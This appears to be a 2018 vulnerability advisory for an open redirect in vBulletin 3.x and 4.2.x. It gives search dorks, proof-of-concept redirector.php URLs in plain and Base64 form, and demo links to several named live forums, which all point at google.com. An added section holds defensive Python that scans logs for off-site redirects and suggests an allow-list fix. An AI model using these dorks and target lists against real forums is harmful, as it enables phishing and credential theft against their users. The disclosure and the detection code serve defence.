[+] Title: vBulletin 3.x.x & 4.2.x Open Redirect Vulnerability
[+] Date: 2018-01-24
[+] Author: Mostafa Gharzi
[+] Vendor Homepage: www.vBulletin.com
[+] Tested on: Windows 10 & Kali Linux
[+] Vulnerable Parameter: url (GET method)
[+] Vulnerable File: /redirector.php?url=
/redirector.php?do=nodelay&url=
[+] Dorks: inurl:/redirector.php?url=
intext:"Powered by vBulletin® Version"
### Notes:
[+] Unvalidated Redirect vulnerability in vBulletin 3.x.x and 4.2.x: the application accepts untrusted input in the url parameter and redirects the request to the URL contained in that input. By pointing that URL at a malicious site, an attacker can launch a phishing attack and steal user credentials.
### POC-I:
[+] http://vB-Forum/redirector.php?url=[URL]
[+] http://vB-Forum/redirector.php?do=nodelay&url=[URL]
### Demo-I:
[+] http://www.alnhdi.net/vb/redirector.php?url=https://www.google.com/
[+] http://hondasquad.com/forum/redirector.php?url=https://google.com/
[+] http://warezhr.org/forum/redirector.php?url=https://google.com/
[+] http://duckload.ws/forum/redirector.php?url=https://google.com/
[+] http://tvoya-stroika.com/redirector.php?url=https://google.com/
[+] http://kadago.de/forum/redirector.php?url=https://google.com/
[+] http://nadi-mahasen.com/vb/redirector.php?do=nodelay&url=https://google.com/
### In some versions the URL is Base64-encoded:
[+] Example: https://www.google.com/
==> Base64 Algorithm
==> aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=
### POC-II:
[+] http://vB-Forum/redirector.php?url=[URL Encoded by Base64]
[+] http://vB-Forum/redirector.php?do=nodelay&url=[URL Encoded by Base64]
### Demo-II:
[+] http://forums.corsairs-harbour.ru/redirector.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=
[+] http://tune-g.ru/forum/redirector.php?do=nodelay&url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=
[+] http://tune-g.ru/forum/redirector.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=
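Defender-side check, added here and not part of the advisory: scan web-server access logs for redirector.php requests whose url parameter, either plain (POC-I) or Base64-encoded (POC-II), points at a host outside the forum's own. The log lines, client IPs and the hosts phish.example / forum.example are constructed; the Base64 value is the advisory's own example.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not from the advisory); the paths mirror the
# two entry points it lists, and the Base64 value is the advisory's own example.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Jan/2018:10:01:02 +0000] "GET /forum/redirector.php?url=https%3A%2F%2Fphish.example%2Flogin HTTP/1.1" 302 -
10.0.0.6 - - [24/Jan/2018:10:01:09 +0000] "GET /forum/redirector.php?do=nodelay&url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8= HTTP/1.1" 302 -
10.0.0.7 - - [24/Jan/2018:10:01:15 +0000] "GET /forum/redirector.php?url=https%3A%2F%2Fforum.example%2Fshowthread.php%3Ft%3D1 HTTP/1.1" 302 -
10.0.0.8 - - [24/Jan/2018:10:01:20 +0000] "GET /forum/showthread.php?t=1 HTTP/1.1" 200 -
"""
REQUEST_RE = re.compile(r'"GET (?P<path>\S+) HTTP/')
URL_PREFIXES = ("http://", "https://", "//")

def decode_target(value: str) -> str:
    """Return the url parameter as a URL, undoing the Base64 form some versions use."""
    if value.lower().startswith(URL_PREFIXES):
        return value
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-8")
    except ValueError:  # not valid Base64, or not valid UTF-8 once decoded
        return value
    # Only trust the decoded form when it actually looks like a URL.
    return decoded if decoded.lower().startswith(URL_PREFIXES) else value

def is_offsite(target: str, allowed_hosts: set) -> bool:
    """True when the target names a host outside the allow-list. Scheme-relative
    //host/... targets carry a netloc and are checked; bare paths count as on-site."""
    parts = urlsplit(target)
    if not parts.netloc:
        return False
    return (parts.hostname or "").lower() not in allowed_hosts

def find_offsite_redirects(log_text: str, allowed_hosts: set) -> list:
    """Return (client_ip, target) for each redirector.php request that points off-site."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        request = urlsplit(match.group("path"))
        if not request.path.endswith("/redirector.php"):
            continue
        for value in parse_qs(request.query).get("url", []):
            target = decode_target(value)
            if is_offsite(target, allowed_hosts):
                hits.append((line.split()[0], target))
    return hits
```

The same decode-then-allow-list check, applied inside redirector.php before issuing the 302, is the fix for the server side: a url value that does not resolve to one of the forum's own hosts should not be followed.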
### Special Thanks:
[+] CertCC.ir
[+] Gucert.ir